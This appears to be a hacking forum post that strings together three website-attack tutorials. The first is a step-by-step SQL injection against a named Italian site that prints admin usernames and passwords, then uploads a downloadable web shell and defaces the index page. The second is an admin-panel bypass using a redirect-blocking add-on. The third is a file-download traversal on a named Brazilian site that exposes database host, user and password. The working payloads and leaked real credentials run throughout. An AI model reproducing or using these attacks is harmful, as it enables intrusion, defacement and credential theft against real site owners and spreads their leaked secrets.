we got the column we will find the vulnerbale column now !
write
http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
still the same ?
add - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-
now
2
1
6
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-
and after 6 add "from Information_schema.tables"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
now enter
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,
these are tables
now we need to guess which table can contain username and password information !
i guess "login"
so we will see login table 1st !
now we will send the query to open login table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
108 111 103 105 110
now change it to
CHAR(108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-
the page show the result
id_login,username,password,email,admin,abilitato,id_friends
this mean these are the columns of table "login"
we need only username and password to login at admin panel so
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all words and add "login"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--
the page show this result
davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0
mean
1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion
etc
now we have the password we will move to admin panel to hack website-----
----------------------------------------------------------------------------------------------------------------------------------
step 4:
goto
http://www.area96.it/admin/index.php
and login with the username and password u just got !
username=davide
password=cippalippa
logged in successfully !
now you have access to change website products news etc ......
but to take fully control we need to upload shell in the webstie !
shell: shell is a kind of control panel which give you access to do whatever you want in the site !
shell is scripted in that way to give access you to do whatever u want to do with the hardrive of website !
there are so many shell available but i will use and recommand u to use
MADSPOTSHELL
its a 1st pakistani and the world best shell !
you can download it from here
http://www.mediafire.com/?8b6dmgdo7edkus2
now find any area from where u can upload this shell like
add image add product etc
i have an option here for add news !
and it give me option of adding image of news !
i will try to upload madspotshell.php from image upload section !
just enter the news it will ask for image select madspotshell.php instead of any image !
upload successfully !
now just find the shell location!
normally it show an error icon on the image !
right click on error icon select copy image url/copy image location
and paste it to the url address like mine is
http://www.area96.it/images/news/1352954638mad.php
hit enter !
shell opened !
now you can remove add edit anyfile from here !
----------------------------------------------------------------------------------------------------------------------------------

last step :
now u are in shell !
u need to hack this site !
the site default page is index
when ever you open a site like the target site is
http://www.area96.it/
it run on http://www.area96.it/index.php
so you will need to change the index.php file
in the shell u are in the directory where shell is uploaded !
like i uploaded ma shell from image section so it is in
http://www.area96.it/images/news/
at the low top
u can see this
PWD: /home/area96/area96.it/images/news/ |CURRENT|
which is showing ure current directory
u need to edit index.php which is located at area96.it
so click on area96.it from
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line
it will open the PWD: /home/area96/area96.it/ |CURRENT|
directory !
now at the center u can see the files located in the folder !
also index.php
just rename ure deface page to index.php and upload it here !
it will over write the file and when someone open the site it will show your deface page at the site instead the site !
upload button is at the botton of the shell !
just replace ure index.php to /home/area96/area96.it/ |CURRENT
and the site is hacked!
now open the website and see ure name is there or not !
http://www.area96.it/

---------------------------------------------------------------------------------------------------------------------------------
NOTE : this post is just to share the knowledge and and for education purpose only the No1 Will be responsible if you do something stupidly and get caught by cops !
try at your own risk
---------------------------------------------------------------------------------------------------------------------------------

How to Bypass The Site Admin Panel Using NoRedirection

Today I Shown How To Hack A Website Using No Redirection. 60% Php Website Admin Panel Can Be Bypass Using This (noRedirection)

Requirement:-

1. Mozila Firefox

3. A Target Website.

Now Lets Start:-

Step1:- Download And Active NoRedirection Addons On Mozilla Firefox

Step2:- Open Your Target Website Admin Panel


Step3:- Guessing The File Name In Admin Folder

Ex:-
     0. http://www.site.com/admin/index.php (same Login Page)
     1. http://www.site.com/admin/login.php (Error, Page Not Found)
     2. http://www.site.com/admin/home.php (Error, Page Not Found)
     3. http://www.site.com/admin/welcome.php (Error, Page Not Found)
     4. http://www.site.com/admin/dashboard.php (Error, Page Not Found)
     5. http://www.site.com/admin/default.php  (error, Page Not Found)
     6. http://www.Site.com/admin/jetking.php (Its Redirect Me On Index.php)
(that Mines jetking.php File Available On Admin Folder, If I try To Open This Its Redirect Me on Login Page(index.php)So I Block That Redirection Using noredirect)

Step4:- Copy And Paste The Redirect Url On NoRedirection Addone I Mozila Firefox. Redirect Url:- http://www.site.com/admin/index.php

Step5:- Now Again Try To Open admin/jetking.php This Time Its Not Redirect Me I Am In Admin Panel.

Done.

You Only Need To Guessing The Files Name In Admin Folder  Or Scan Website Directory For Finds Admin File

How to Hack Sites With Local File Dislocation

What Is LFD:-

In Local File Dislocation, Attacker Can Abe To Download Config.php (DataBase) File, And Theft The Db Pass, user Name, Database, Host_name And Connect To The Database Using Some Soft (Hedi Sql), And Than Attacker Login To PhpMyAdmin. In Local File Dislocation Url Shown The Web Server Directory(that Is vulnerable Section)

Ex:-

www.site.com/download.php?arquivo=/home/mturbina2/public_html/sistema/apresentacao.pdf
Ok Lets Start I Have A Website Try To Download

Config File:-

Target:- www.mturbina.com.br/site/download.php?arquivo=/home/mturbina2/public_html/sistema/produtos/kaindl/000000011/pdf/apresentacao.pdf

Step:-1 

Copy And Paste The Target Url On The WebBrowser Url Bar, And Hit Enter.

Step:-2 

If We Can Hit The Enter One File Can Be Download, This File Is Useless, We Only Need To Download The Index.php And Config.php

Step:-3 

Remove The All Url Section After ( download.php?arquivo= ) Or Remove The Url After ( =/home/mturbina2/public_html/ ) Follow Any One Condition I Follow First Condition.

Ex:- (Url Now Look Like This)
www.mturbina.com.br/site/download.php?arquivo=

Step:-4 

Put the ( ../index.php ) After The ?arquivo= Its Use For Directory Jumping Or Send To Back On One Directory on Server. Some Time We Use( ../../../../../../../index.php ) More Than One Time For Correct Location. (But In this Site We Not Need To Jumping To Another Location, So We Not Need To Put (,,/))

Ex:- Now Url Like This:- http://www.mturbina.com.br/site/download.php?arquivo=index.php
You Can See The Index.php File Start To Downloading (Download It)

Step:-5 

Open The Download File(index.php) Open It In Notepad Using This (index.php) We Find Out The Config.php(data Base Connection) File Location We Find out The Successfully Location Of Config File ("../sistema/config.php ")

Step:-6 

Now Donload The ( ../sistema/config.php )
File. And Connect To DataBase.

Ex:- http://www.mturbina.com.br/site/download.php?arquivo=../sistema/config.php

Step:-7 

Open The HeidiSQL Download Here ( http://www.heidisql.com/download.php ) And Put Data Base Entry In this.

Config Entry For HediSql:- Located In Config File
Db_Hostname=179.188.16.14
DbUser=mturbina2
DbPass=turbina72